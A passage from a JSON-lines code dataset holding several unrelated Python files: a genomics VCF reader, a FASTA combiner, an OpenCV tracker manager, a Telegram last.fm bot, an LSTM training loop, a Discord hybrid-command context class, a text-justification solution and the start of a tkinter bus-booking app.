vcf_fn\n\t\tself.colnames = self.read_vcf_header(vcf_fn, verbose=verbose)\n\t\trowdata, data = self.read_vcf(vcf_fn, self.colnames, verbose=verbose)\n\t\tself.rowdata = rowdata\n\t\tself.data = data\n\t\tif pheno_fn != None:\n\t\t\tcoldata = self.read_phenotype(pheno_fn, self.data.columns, verbose=verbose)\n\t\t\tself.coldata = coldata\n\n\n\tdef read_vcf_header(self, vcf_fn, verbose=False):\n\t\tif verbose: \n\t\t\tprint(\"Reading VCF header.\")\n\n\t\tif \".gz\" in vcf_fn:\n\t\t\twith gzip.open(vcf_fn, \"r\") as f:\n\t\t\t\tfor line in f:\n\t\t\t\t\tline = line.decode(\"utf-8\").strip()\n\t\t\t\t\tif line.startswith(\"#CHROM\"):\n\t\t\t\t\t\tsplit_line = line.split(\"\\t\")\n\t\t\t\t\t\tsplit_line[0] = \"CHROM\"\n\t\telse:\n\t\t\twith open(vcf_fn, \"r\") as f:\n\t\t\t\tfor line in f:\n\t\t\t\t\tline = line.strip()\n\t\t\t\t\tif line.startswith(\"#CHROM\"):\n\t\t\t\t\t\tsplit_line = line.split(\"\\t\")\n\t\t\t\t\t\tsplit_line[0] = \"CHROM\"\n\t\treturn split_line\n\n\n\t# def read_vcf(self, vcf_fn, colnames, verbose=False):\n\t# \tif verbose:\n\t# \t\tprint(\"Reading VCF content.\")\n\t# \tvcf = pd.read_table(vcf_fn, comment=\"#\", header=None, names=colnames)\n\t# \trowdata = vcf[['CHROM', 'POS', 'ID', 'REF', 'ALT', 'QUAL', 'FILTER', 'INFO', 'FORMAT']]\n\t# \tdata = vcf.iloc[:,9:]\n\t# \treturn rowdata, data\n\n\tdef read_vcf(self, vcf_fn, colnames, verbose=False):\n\t\tif verbose:\n\t\t\tprint(\"Reading VCF content line-by-line.\")\n\n\t\tcontainer = DefaultOrderedDict(list)\n\t\tif \".gz\" in vcf_fn:\n\t\t\twith gzip.open(vcf_fn, \"r\") as f:\n\t\t\t\tfor line in f:\n\t\t\t\t\tline = line.decode(\"utf-8\").strip()\n\t\t\t\t\tif line.startswith(\"#\"): # Skip comment lines.\n\t\t\t\t\t\tcontinue\n\t\t\t\t\telse:\n\t\t\t\t\t\tsplit_line = line.split(\"\\t\")\n\t\t\t\t\t\tassert len(colnames) == len(split_line)\n\t\t\t\t\t\tfor field, entry in zip(colnames, split_line):\n\t\t\t\t\t\t\tif field in ['CHROM', 'ID', 'REF', 'ALT', 'QUAL', 'FILTER', 'INFO', 'FORMAT']:\n\t\t\t\t\t\t\t\tcontainer[field].append(entry)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tcontainer[field].append(int(entry))\n\t\telse:\n\t\t\twith open(vcf_fn, \"r\") as f:\n\t\t\t\tfor line in f:\n\t\t\t\t\tline = line.strip()\n\t\t\t\t\tif line.startswith(\"#\"): # Skip comment lines.\n\t\t\t\t\t\tcontinue\n\t\t\t\t\telse:\n\t\t\t\t\t\tsplit_line = line.split(\"\\t\")\n\t\t\t\t\t\tassert len(colnames) == len(split_line)\n\t\t\t\t\t\tfor field, entry in zip(colnames, split_line):\n\t\t\t\t\t\t\tcontainer[field].append(entry)\n\t\tvcf = pd.DataFrame(container)\n\t\trowdata = vcf[['CHROM', 'POS', 'ID', 'REF', 'ALT', 'QUAL', 'FILTER', 'INFO', 'FORMAT']]\n\t\tdata = vcf.iloc[:,9:]\n\t\treturn rowdata, data\n\n\n\n\tdef read_phenotype(self, pheno_fn, sample, verbose=False):\n\t\tif verbose:\n\t\t\tprint(\"Reading Phenotype file.\")\n\t\tpheno = pd.read_table(pheno_fn)\n\t\tpheno = pheno[pheno[\"Accession_ID\"].isin(sample)]\n\t\tpheno.set_index(\"Accession_ID\", inplace=True)\n\t\tpheno = pheno.loc[~pheno.index.duplicated(keep='first')]\n\t\tpheno = pheno.reindex(sample)\n\t\tpheno.reset_index(inplace=True)\n\t\tpheno.rename(columns={\"index\":\"Accession_ID\"}, inplace=True)\n\t\treturn pheno\n\n\n\tdef remove_singletons(self):\n\t\tn_alt = self.data.apply(sum, axis=1)\n\t\tself.data = self.data[n_alt>1]\n\t\tself.rowdata = self.rowdata[n_alt>1]\n\n\n\tdef __repr__(self):\n\t\treturn f\"VCF: {self.vcf_fn}\\nNumber of samples: {self.data.shape[1]}\\nNumber of sites: {self.data.shape[0]}\"\n\n\n\tdef __eq__(self, other):\n\t\tif not isinstance(other, VCF):\n\t\t\treturn False\n\t\treturn self.data.equals(other.data) and self.rowdata.equals(other.rowdata)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"boxiangliu/covseq","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"71371932008","text":"from Bio import SeqIO\n\nwith open('species.txt') as f:\n\tfor line in f.readlines():\n\t\tsn = line.strip()\n\t\ts = ''\n\t\tres = open('%s.fa' % sn, 'w')\n\t\twith open('filtered.muscle.list') as f1:\n\t\t\tfor line1 in f1.readlines():\n\t\t\t\ti = line1.strip()\n\t\t\t\tfor info in SeqIO.parse(i, 'fasta'):\n\t\t\t\t\tif sn in info.id:\n\t\t\t\t\t\ts += str(info.seq)\n\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\tcontinue\n\t\tres.write('>%s\\n' % sn)\n\t\tres.write('%s\\n' % s)\n\t\tres.close()\n\n","repo_name":"YuboWang1994/Oat-genome-origin-and-evolution","sub_path":"subgenome_evolution/combine_gblock.py","file_name":"combine_gblock.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"74841651047","text":"import logging\nimport Constants\nfrom TrackerOpenCV import TrackerOpenCV\nfrom cv2 import cv2\n\nclass TrackerManager:\n def __init__(self, input_json, tracker_type=Constants.OPENCV_TYPE, threshold_objects=10):\n self.tracker_type = tracker_type.lower()\n if tracker_type == Constants.OPENCV_TYPE:\n self.trackers = cv2.MultiTracker_create()\n else:\n logging.error(\"Pls, implement MultiTracker for\", tracker_type)\n raise Exception(\"Pls, implement MultiTracker for\", tracker_type)\n return\n self.threshold_objects = threshold_objects\n self.input_json = input_json\n\n def update_all(self, frame):\n # grab the updated bounding box coordinates (if any) for each\n # object that is being tracked\n (success, boxes) = self.trackers.update(frame)\n # loop over the bounding boxes and draw then on the frame\n for box in boxes:\n (x, y, w, h) = [int(v) for v in box]\n # Draw rectangles\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n return frame\n\n def init_trackers(self, tracker_name, frame):\n # read json and initiate objects\n cnt = 0\n for element in self.input_json:\n box = (element['coordinates'][0], element['coordinates'][1],\n element['coordinates'][2], element['coordinates'][3])\n try:\n if cnt + 1 <= self.threshold_objects:\n if self.tracker_type == Constants.OPENCV_TYPE:\n # check the most common trackers (kcf, csrt or tld)\n if tracker_name == Constants.KCF or tracker_name == Constants.CSRT or \\\n tracker_name == Constants.TLD:\n tracker = TrackerOpenCV(tracker_name)\n logging.info(tracker_name + \" tracker inited!\")\n else:\n logging.error(\"Pls, implement Tracker for\", self.tracker_type)\n raise Exception(\"Pls, implement Tracker for\", self.tracker_type)\n return\n self.trackers.add(tracker.tracker, frame, box)\n cnt += 1 # increase the number of tracked objects\n except:\n logging.error(\"Error while initializing the tracker\", self.tracker_type)\n raise Exception(\"Error while initializing the tracker\", self.tracker_type)\n return\n","repo_name":"lddtandil/multitracker_object_dockerized","sub_path":"src/TrackerManager.py","file_name":"TrackerManager.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73576081769","text":"\nfrom pprint import pprint\n\nfrom aiogram import types\n\nfrom app_telegram.keyboards import kb_auth, kb_auth_url, kb_trek\nfrom repositories.url_requests import AuthRepositories\nfrom repositories.sql_requests import SQLRepositories\n\n\nasync def start_bot(message: types.Message):\n await SQLRepositories.add_user(message.chat.id)\n await message.answer(\"Добро пожаловать\", reply_markup=kb_auth)\n\n\nasync def auth(message: types.Message):\n await message.answer(\"Авторизуйтесь на сайте\\n\"\n \"После чего вернитесь в бот\", reply_markup=kb_auth_url)\n await message.answer(\"Для получения текущей песни нажмите ниже\", reply_markup=kb_trek)\n\n\nasync def get_trek(message: types.Message):\n username = await SQLRepositories.get_username(message.chat.id)\n trek_data = AuthRepositories.request_trek(username)\n pprint(trek_data)\n await message.answer(f\"Артист: {trek_data['artist']['#text']}\\nИмя трека: {trek_data['name']}\\n{trek_data['url']}\")\n","repo_name":"Andrei00001/last.fm","sub_path":"app_telegram/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69896015209","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\n\nimport src.constants as constants\nfrom src.networks.lstm_embedding_network import LstmEmbeddingNetwork\nfrom src.results_aggregator import ResultsAggregator\n\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\nclass NetworkTrainer:\n def __init__(self,\n network: LstmEmbeddingNetwork,\n train_data_loader: DataLoader,\n test_data_loader: DataLoader,\n valid_data_loader: DataLoader,\n total_epochs: int,\n is_dynamic_lr_scheduler: bool):\n\n self.network = network\n\n self.train_data_loader = train_data_loader\n self.test_data_loader = test_data_loader\n self.valid_data_loader = valid_data_loader\n\n self.loss_function = nn.CrossEntropyLoss()\n self.optimizer = optim.SGD(network.parameters(), lr=0.01, momentum=0.9)\n\n self.is_dynamic_lr_scheduler = is_dynamic_lr_scheduler\n \n if is_dynamic_lr_scheduler:\n self.lr_scheduler = optim.lr_scheduler.ReduceLROnPlateau(self.optimizer, patience=2, verbose=True)\n else:\n lr_lambda = lambda epoch: (total_epochs - epoch) / total_epochs\n self.lr_scheduler = optim.lr_scheduler.LambdaLR(self.optimizer, lr_lambda=lr_lambda, verbose=True)\n\n\n def get_loss(self, model_output, y_target):\n return self.loss_function(model_output, y_target)\n\n def get_accuracy(self, model_output, y_target):\n output_class_pred = model_output.argmax(dim=1)\n equal_samples = torch.eq(output_class_pred, y_target)\n\n return equal_samples.sum() / constants.BATCH_SIZE\n\n\n def epoch_train(self, epoch):\n self.network.train()\n\n results_aggregator = ResultsAggregator()\n\n (h, c) = self.network.get_initial_hidden_context()\n cur_song_index = 0\n\n for batch_idx, (song_index, x, y) in enumerate(self.train_data_loader):\n if len(x) < constants.BATCH_SIZE:\n continue # Do not support smaller tensors that are not of batch size as first dimension\n\n if cur_song_index != song_index.item():\n (h, c) = self.network.get_initial_hidden_context()\n cur_song_index = song_index.item()\n\n self.optimizer.zero_grad()\n\n x = x.to(device)\n y = y.to(device)\n\n output, (h, c) = self.network(x, (h, c))\n\n loss = self.get_loss(output, y)\n results_aggregator.aggregate_loss(loss.item())\n\n h = h.detach()\n c = c.detach()\n\n loss.backward()\n self.optimizer.step()\n\n accuracy = self.get_accuracy(output, y)\n results_aggregator.aggregate_accuracy(accuracy.item())\n\n if batch_idx % constants.BATCH_LOG_INTERVAL == 0 and batch_idx != 0:\n current_item = batch_idx * len(x)\n\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\t\\tAverage Loss: {:.6f}\\tAverage Right Predictions: {:.4f}'.format(\n f\"{epoch:03d}\",\n f\"{current_item:04d}\",\n len(self.train_data_loader.dataset),\n 100. * batch_idx / len(self.train_data_loader),\n results_aggregator.get_average_loss(batch_idx), \n results_aggregator.get_average_accuracy(batch_idx)\n ))\n\n batch_idx = int(len(self.train_data_loader.dataset) / constants.BATCH_SIZE)\n results_aggregator.update_plots('train', batch_idx, epoch)\n \n\n def epoch_valid(self, epoch):\n self.network.eval()\n\n results_aggregator = ResultsAggregator()\n\n (h, c) = self.network.get_initial_hidden_context()\n cur_song_index = 0\n\n for batch_idx, (song_index, x, y) in enumerate(self.valid_data_loader):\n if len(x) < constants.BATCH_SIZE:\n continue # Do not support smaller tensors that are not of batch size as first dimension\n\n if cur_song_index != song_index.item():\n (h, c) = self.network.get_initial_hidden_context()\n cur_song_index = song_index.item()\n\n self.optimizer.zero_grad()\n\n x = x.to(device)\n y = y.to(device)\n\n output, (h, c) = self.network(x, (h, c))\n\n loss = self.get_loss(output, y)\n results_aggregator.aggregate_loss(loss.item())\n\n accuracy = self.get_accuracy(output, y)\n results_aggregator.aggregate_accuracy(accuracy.item())\n\n if batch_idx % constants.VALID_PREDICTION_SAMPLE_RATE == 0 and batch_idx != 0:\n current_item = batch_idx * len(x)\n\n print('Valid Epoch: {} [{}/{} ({:.0f}%)]\\tAverage Loss: {:.6f}\\tAverage Right Predictions: {:.4f}'.format(\n f\"{epoch:03d}\",\n f\"{current_item:04d}\",\n len(self.valid_data_loader.dataset),\n 100. * batch_idx / len(self.valid_data_loader),\n results_aggregator.get_average_loss(batch_idx), \n results_aggregator.get_average_accuracy(batch_idx)\n ))\n \n average_loss = results_aggregator.get_average_loss(len(self.valid_data_loader.dataset))\n \n if constants.APPLY_LR_SCHEDULER:\n self.lr_scheduler.step(average_loss)\n learning_rate = self.lr_scheduler.optimizer.param_groups[0]['lr']\n\n # if self.is_dynamic_lr_scheduler:\n # print(f'learning_rate: {learning_rate}')\n\n batch_idx = int(len(self.valid_data_loader.dataset) / constants.BATCH_SIZE)\n results_aggregator.update_plots('valid', batch_idx, epoch)\n\n\n def test(self):\n self.network.eval()\n\n results_aggregator = ResultsAggregator()\n\n (h, c) = self.network.get_initial_hidden_context()\n cur_song_index = 0\n\n for _, (song_index, x, y) in enumerate(self.test_data_loader):\n if len(x) < constants.BATCH_SIZE:\n continue # Do not support smaller tensors that are not of batch size as first dimension\n\n if cur_song_index != song_index.item():\n (h, c) = self.network.get_initial_hidden_context()\n cur_song_index = song_index.item()\n\n self.optimizer.zero_grad()\n\n x = x.to(device)\n y = y.to(device)\n\n output, (h, c) = self.network(x, (h, c))\n\n loss = self.get_loss(output, y)\n results_aggregator.aggregate_loss(loss.item())\n\n accuracy = self.get_accuracy(output, y)\n results_aggregator.aggregate_accuracy(accuracy.item())\n\n current_item = int(len(self.test_data_loader.dataset) / constants.BATCH_SIZE)\n\n print('Test [{}/{}]\\tAverage Loss: {:.6f}\\tAverage Right Predictions: {:.4f}'.format(\n len(self.test_data_loader.dataset),\n len(self.test_data_loader.dataset),\n results_aggregator.get_average_loss(current_item), \n results_aggregator.get_average_accuracy(current_item)\n ))\n \n return results_aggregator.get_average_accuracy(current_item)","repo_name":"arsenaultk9/chord2vec","sub_path":"src/network_trainer.py","file_name":"network_trainer.py","file_ext":"py","file_size_in_byte":7261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14425798778","text":"import datetime\n\nfrom typing import TYPE_CHECKING, Any, Optional, Union, Iterable, Sequence\nfrom typing_extensions import Self\n\n\nfrom interactions import (\n BaseContext,\n Permissions,\n Message,\n SlashContext,\n Client,\n Typing,\n Embed,\n BaseComponent,\n UPLOADABLE_TYPE,\n Snowflake_Type,\n Sticker,\n AllowedMentions,\n MessageReference,\n MessageFlags,\n to_snowflake,\n Attachment,\n process_message_payload,\n)\nfrom interactions.client.mixins.send import SendMixin\nfrom interactions.ext import prefixed_commands as prefixed\n\nif TYPE_CHECKING:\n from .hybrid_slash import HybridSlashCommand\n\n__all__ = (\"HybridContext\",)\n\n\nclass DeferTyping:\n def __init__(self, ctx: \"HybridContext\", ephermal: bool) -> None:\n self.ctx = ctx\n self.ephermal = ephermal\n\n async def __aenter__(self) -> None:\n await self.ctx.defer(ephemeral=self.ephermal)\n\n async def __aexit__(self, *_) -> None:\n pass\n\n\nclass HybridContext(BaseContext, SendMixin):\n prefix: str\n \"The prefix used to invoke this command.\"\n\n app_permissions: Permissions\n \"\"\"The permissions available to this context\"\"\"\n\n deferred: bool\n \"\"\"Whether the context has been deferred.\"\"\"\n responded: bool\n \"\"\"Whether the context has been responded to.\"\"\"\n ephemeral: bool\n \"\"\"Whether the context response is ephemeral.\"\"\"\n\n _command_name: str\n \"\"\"The command name.\"\"\"\n _message: Message | None\n\n args: list[Any]\n \"\"\"The arguments passed to the command.\"\"\"\n kwargs: dict[str, Any]\n \"\"\"The keyword arguments passed to the command.\"\"\"\n\n __attachment_index__: int\n\n _slash_ctx: SlashContext | None\n _prefixed_ctx: prefixed.PrefixedContext | None\n\n def __init__(self, client: Client):\n super().__init__(client)\n self.prefix = \"\"\n self.app_permissions = Permissions(0)\n self.deferred = False\n self.responded = False\n self.ephemeral = False\n self._command_name = \"\"\n self.args = []\n self.kwargs = {}\n self._message = None\n self.__attachment_index__ = 0\n self._slash_ctx = None\n self._prefixed_ctx = None\n\n @classmethod\n def from_dict(cls, client: Client, payload: dict) -> None:\n # this doesn't mean anything, so just implement it to make abc happy\n raise NotImplementedError\n\n @classmethod\n def from_slash_context(cls, ctx: SlashContext) -> Self:\n self = cls(ctx.client)\n self.guild_id = ctx.guild_id\n self.channel_id = ctx.channel_id\n self.author_id = ctx.author_id\n self.message_id = ctx.message_id\n self.prefix = \"/\"\n self.app_permissions = ctx.app_permissions\n self.deferred = ctx.deferred\n self.responded = ctx.responded\n self.ephemeral = ctx.ephemeral\n self._command_name = ctx._command_name\n self.args = ctx.args\n self.kwargs = ctx.kwargs\n self._slash_ctx = ctx\n return self\n\n @classmethod\n def from_prefixed_context(cls, ctx: prefixed.PrefixedContext) -> Self:\n # this is a \"best guess\" on what the permissions are\n # this may or may not be totally accurate\n if hasattr(ctx.channel, \"permissions_for\"):\n app_permissions = ctx.channel.permissions_for(ctx.guild.me) # type: ignore\n elif ctx.channel.type in {10, 11, 12}: # it's a thread\n app_permissions = ctx.channel.parent_channel.permissions_for(ctx.guild.me) # type: ignore\n else:\n app_permissions = Permissions(0)\n\n self = cls(ctx.client)\n self.guild_id = ctx.guild_id\n self.channel_id = ctx.channel_id\n self.author_id = ctx.author_id\n self.message_id = ctx.message_id\n self._message = ctx.message\n self.prefix = ctx.prefix\n self.app_permissions = app_permissions\n self._command_name = ctx.command.qualified_name\n self.args = ctx.args\n self._prefixed_ctx = ctx\n return self\n\n @property\n def inner_context(self) -> SlashContext | prefixed.PrefixedContext:\n \"\"\"The inner context that this hybrid context is wrapping.\"\"\"\n return self._slash_ctx or self._prefixed_ctx # type: ignore\n\n @property\n def command(self) -> \"HybridSlashCommand\":\n return self.client._interaction_lookup[self._command_name]\n\n @property\n def expires_at(self) -> Optional[datetime.datetime]:\n \"\"\"The time at which the interaction expires.\"\"\"\n if not self._slash_ctx:\n return None\n\n if self.responded:\n return self._slash_ctx.id.created_at + datetime.timedelta(minutes=15)\n return self._slash_ctx.id.created_at + datetime.timedelta(seconds=3)\n\n @property\n def expired(self) -> bool:\n \"\"\"Whether the interaction has expired.\"\"\"\n return datetime.datetime.utcnow() > self.expires_at if self._slash_ctx else False\n\n @property\n def deferred_ephemeral(self) -> bool:\n \"\"\"Whether the interaction has been deferred ephemerally.\"\"\"\n return self.deferred and self.ephemeral\n\n @property\n def message(self) -> Message | None:\n \"\"\"The message that invoked this context.\"\"\"\n return self._message or self.client.cache.get_message(self.channel_id, self.message_id)\n\n @property\n def typing(self) -> Typing | DeferTyping:\n \"\"\"A context manager to send a _typing/defer state to a given channel as long as long as the wrapped operation takes.\"\"\"\n if self._slash_ctx:\n return DeferTyping(self._slash_ctx, self.ephemeral)\n return self.channel.typing\n\n async def defer(self, ephemeral: bool = False) -> None:\n \"\"\"\n Either defers the response (if used in an interaction) or triggers a typing indicator for 10 seconds (if used for messages).\n\n Args:\n ephemeral: Should the response be ephemeral? Only applies to responses for interactions.\n\n \"\"\"\n if self._slash_ctx:\n await self._slash_ctx.defer(ephemeral=ephemeral)\n else:\n await self.channel.trigger_typing()\n\n self.deferred = True\n\n async def reply(\n self,\n content: Optional[str] = None,\n embeds: Optional[\n Union[\n Iterable[Union[Embed, dict]],\n Union[Embed, dict],\n ]\n ] = None,\n embed: Optional[Union[Embed, dict]] = None,\n **kwargs,\n ) -> \"Message\":\n \"\"\"\n Reply to this message, takes all the same attributes as `send`.\n\n For interactions, this functions the same as `send`.\n \"\"\"\n kwargs = locals()\n kwargs.pop(\"self\")\n extra_kwargs = kwargs.pop(\"kwargs\")\n kwargs |= extra_kwargs\n\n if self._slash_ctx:\n result = await self.send(**kwargs)\n else:\n kwargs.pop(\"ephemeral\", None)\n result = await self._prefixed_ctx.reply(**kwargs)\n\n self.responded = True\n return result\n\n async def _send_http_request(\n self,\n message_payload: dict,\n files: Iterable[\"UPLOADABLE_TYPE\"] | None = None,\n ) -> dict:\n if self._slash_ctx:\n return await self._slash_ctx._send_http_request(message_payload, files)\n return await self._prefixed_ctx._send_http_request(message_payload, files)\n\n async def send(\n self,\n content: Optional[str] = None,\n *,\n embeds: Optional[\n Union[\n Iterable[Union[\"Embed\", dict]],\n Union[\"Embed\", dict],\n ]\n ] = None,\n embed: Optional[Union[\"Embed\", dict]] = None,\n components: Optional[\n Union[\n Iterable[Iterable[Union[\"BaseComponent\", dict]]],\n Iterable[Union[\"BaseComponent\", dict]],\n \"BaseComponent\",\n dict,\n ]\n ] = None,\n stickers: Optional[\n Union[\n Iterable[Union[\"Sticker\", \"Snowflake_Type\"]],\n \"Sticker\",\n \"Snowflake_Type\",\n ]\n ] = None,\n allowed_mentions: Optional[Union[\"AllowedMentions\", dict]] = None,\n reply_to: Optional[Union[\"MessageReference\", \"Message\", dict, \"Snowflake_Type\"]] = None,\n files: Optional[Union[\"UPLOADABLE_TYPE\", Iterable[\"UPLOADABLE_TYPE\"]]] = None,\n file: Optional[\"UPLOADABLE_TYPE\"] = None,\n tts: bool = False,\n suppress_embeds: bool = False,\n silent: bool = False,\n flags: Optional[Union[int, \"MessageFlags\"]] = None,\n delete_after: Optional[float] = None,\n ephemeral: bool = False,\n **kwargs: Any,\n ) -> \"Message\":\n \"\"\"\n Send a message.\n\n Args:\n content: Message text content.\n embeds: Embedded rich content (up to 6000 characters).\n embed: Embedded rich content (up to 6000 characters).\n components: The components to include with the message.\n stickers: IDs of up to 3 stickers in the server to send in the message.\n allowed_mentions: Allowed mentions for the message.\n reply_to: Message to reference, must be from the same channel.\n files: Files to send, the path, bytes or File() instance, defaults to None. You may have up to 10 files.\n file: Files to send, the path, bytes or File() instance, defaults to None. You may have up to 10 files.\n tts: Should this message use Text To Speech.\n suppress_embeds: Should embeds be suppressed on this send\n silent: Should this message be sent without triggering a notification.\n flags: Message flags to apply.\n delete_after: Delete message after this many seconds.\n ephemeral: Should this message be sent as ephemeral (hidden) - only works with interactions\n\n Returns:\n New message object that was sent.\n \"\"\"\n flags = MessageFlags(flags or 0)\n if ephemeral and self._slash_ctx:\n flags |= MessageFlags.EPHEMERAL\n self.ephemeral = True\n if suppress_embeds:\n flags |= MessageFlags.SUPPRESS_EMBEDS\n if silent:\n flags |= MessageFlags.SILENT\n\n return await super().send(\n content=content,\n embeds=embeds,\n embed=embed,\n components=components,\n stickers=stickers,\n allowed_mentions=allowed_mentions,\n reply_to=reply_to,\n files=files,\n file=file,\n tts=tts,\n flags=flags,\n delete_after=delete_after,\n pass_self_into_delete=bool(self._slash_ctx),\n **kwargs,\n )\n\n async def delete(self, message: \"Snowflake_Type\") -> None:\n \"\"\"\n Delete a message sent in response to this context. Must be in the same channel as the context.\n\n Args:\n message: The message to delete\n \"\"\"\n if self._slash_ctx:\n return await self._slash_ctx.delete(message)\n await self.client.http.delete_message(self.channel_id, to_snowflake(message))\n\n async def edit(\n self,\n message: \"Snowflake_Type\",\n *,\n content: Optional[str] = None,\n embeds: Optional[\n Union[\n Iterable[Union[\"Embed\", dict]],\n Union[\"Embed\", dict],\n ]\n ] = None,\n embed: Optional[Union[\"Embed\", dict]] = None,\n components: Optional[\n Union[\n Iterable[Iterable[Union[\"BaseComponent\", dict]]],\n Iterable[Union[\"BaseComponent\", dict]],\n \"BaseComponent\",\n dict,\n ]\n ] = None,\n attachments: Optional[Sequence[Attachment | dict]] = None,\n allowed_mentions: Optional[Union[\"AllowedMentions\", dict]] = None,\n files: Optional[Union[\"UPLOADABLE_TYPE\", Iterable[\"UPLOADABLE_TYPE\"]]] = None,\n file: Optional[\"UPLOADABLE_TYPE\"] = None,\n tts: bool = False,\n ) -> \"Message\":\n if self._slash_ctx:\n return await self._slash_ctx.edit(\n message,\n content=content,\n embeds=embeds,\n embed=embed,\n components=components,\n attachments=attachments,\n allowed_mentions=allowed_mentions,\n files=files,\n file=file,\n tts=tts,\n )\n\n message_payload = process_message_payload(\n content=content,\n embeds=embeds or embed,\n components=components,\n allowed_mentions=allowed_mentions,\n attachments=attachments,\n tts=tts,\n )\n if file:\n files = [file, *files] if files else [file]\n\n message_data = await self.client.http.edit_message(\n message_payload, self.channel_id, to_snowflake(message), files=files\n )\n if message_data:\n return self.client.cache.place_message_data(message_data)\n","repo_name":"interactions-py/interactions.py","sub_path":"interactions/ext/hybrid_commands/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":13057,"program_lang":"python","lang":"en","doc_type":"code","stars":760,"dataset":"github-code","pt":"53"} +{"seq_id":"73657634408","text":"\"\"\"\nThis problem was asked by Palantir.\n\nWrite an algorithm to justify text. Given a sequence of words and an integer line length k,\nreturn a list of strings which represents each line, fully justified.\n\nMore specifically, you should have as many words as possible in each line.\nThere should be at least one space between each word.\n Pad extra spaces when necessary so that each line has exactly length k.\n Spaces should be distributed as equally as possible, with the extra spaces, if any, distributed starting from the left.\n\nIf you can only fit one word on a line, then you should pad the right-hand side with spaces.\n\nEach word is guaranteed not to be longer than k.\n\nFor example, given the list of words [\"the\", \"quick\", \"brown\", \"fox\", \"jumps\", \"over\", \"the\", \"lazy\", \"dog\"] and k = 16,\n you should return the following:\n\n[\"the quick brown\", # 1 extra space on the left\n\"fox jumps over\", # 2 extra spaces distributed evenly\n\"the lazy dog\"] # 4 extra spaces distributed evenly\n\"\"\"\n\n\ndef fullJustify(words, maxWidth):\n j = 0\n ans = []\n n = len(words)\n while j < n:\n curr_str = \"\"\n i = j\n curr_sum = 0\n space = 0\n while j < n and curr_sum + len(words[j]) + space <= maxWidth:\n curr_sum += len(words[j])\n j += 1\n space += 1\n total_spaces = maxWidth - curr_sum\n if j >= n:\n flag = \"first\"\n for x in range(i, j):\n if flag == \"first\":\n curr_str = curr_str + words[x]\n flag = \"last\"\n else:\n curr_str = curr_str + \" \" +words[x]\n else:\n\n mandatory_spaces = total_spaces // (j - i - 1 or 1)\n extra_spaces = total_spaces % (j - i - 1 or 1)\n for x in range(i, j):\n curr_str = curr_str + words[x]\n s = 0\n while s < mandatory_spaces and x < j - 1:\n curr_str = curr_str + \" \"\n s += 1\n if extra_spaces > 0:\n extra_spaces -= 1\n curr_str = curr_str + \" \"\n while len(curr_str) < maxWidth:\n curr_str = curr_str + \" \"\n ans.append(curr_str)\n return ans\n\n\nwords = [\"What\",\"must\",\"be\",\"acknowledgment\",\"shall\",\"be\"]\nmaxWidth = 16\nans = fullJustify(words, maxWidth)\nprint(ans)\n","repo_name":"anirudhsingla8/daily_coding_problem","sub_path":"daily_coding_problem_28.py","file_name":"daily_coding_problem_28.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72497461289","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\nimport sqlite3\r\n\r\nconn = sqlite3.Connection(\"Database.db\")\r\n\r\nc = conn.cursor()\r\n\r\nc.execute(\r\n \"CREATE Table IF NOT EXISTS BUS(OPERATOR text,BUS_TYPE text,D_FROM text,A_TO text,DATE text,DEP_TIME text,ARR_TIME text,FARE integer,SEATS integer)\")\r\nconn.commit()\r\n\r\n\r\nsplash_root = Tk()\r\nsplash_root.geometry(\"1000x1000\")\r\nsplash_label = Label(splash_root, text=\"Python and DBS Project\", font=\"Times 50 bold\", relief=\"raised\")\r\nsplash_label.pack()\r\nimg1 = PhotoImage(file=\"Python.png\")\r\nsplash_image = Label(splash_root, image=img1).pack()\r\nsplash_label = Label(splash_root, text=\"Samarth Dubey\", font=\"Times 30 bold\")\r\nsplash_label.pack()\r\nsplash_label = Label(splash_root, text=\"191B304\", font=\"Times 30 bold\")\r\nsplash_label.pack()\r\nsplash_label = Label(splash_root, text=\"B9\", font=\"Times 30 bold\")\r\nsplash_label.pack()\r\ndef splashDestroy():\r\n\tsplash_root.destroy()\r\nsplash_root.after(2000,splashDestroy)\r\nsplash_root.mainloop()\r\n\r\nroot = Tk()\r\nroot.geometry(\"1000x1000\")\r\nroot_label = Label(root, text=\"BUS BOOKING SERVICE\", fg=\"blue\",font=\"Times 50 bold\", relief=\"raised\")\r\nroot_label.grid(columnspan=3,padx=100,pady=30)\r\nimg = PhotoImage(file=\"Bus.png\")\r\nroot_image = Label(root, image=img).grid(columnspan=3,padx=100,pady=100)\r\n\r\ndef add_bus():\r\n add_root = Tk()\r\n global img2\r\n add_root.geometry(\"1000x1000\")\r\n # img2 = PhotoImage(file=\"bus.png\")\r\n # Label(add_root, image=img2).grid()\r\n add_root_label = Label(add_root, text=\"BUS BOOKING SERVICE\", fg=\"blue\",font=\"Times 50 bold\", relief=\"raised\")\r\n add_root_label.grid(padx=100,pady=30,columnspan=2)\r\n \r\n def detail():\r\n l1=Label(add_root,text=\"Operator ID\").grid()\r\n e1=Entry(add_root)\r\n e1.grid(row=9,column=1)\r\n V=StringVar(add_root)\r\n V.set(\"All Types\")\r\n choice=['A/C','Non-A/C','A/C Sleeper','Non-A/C Sleeper','All Types']\r\n 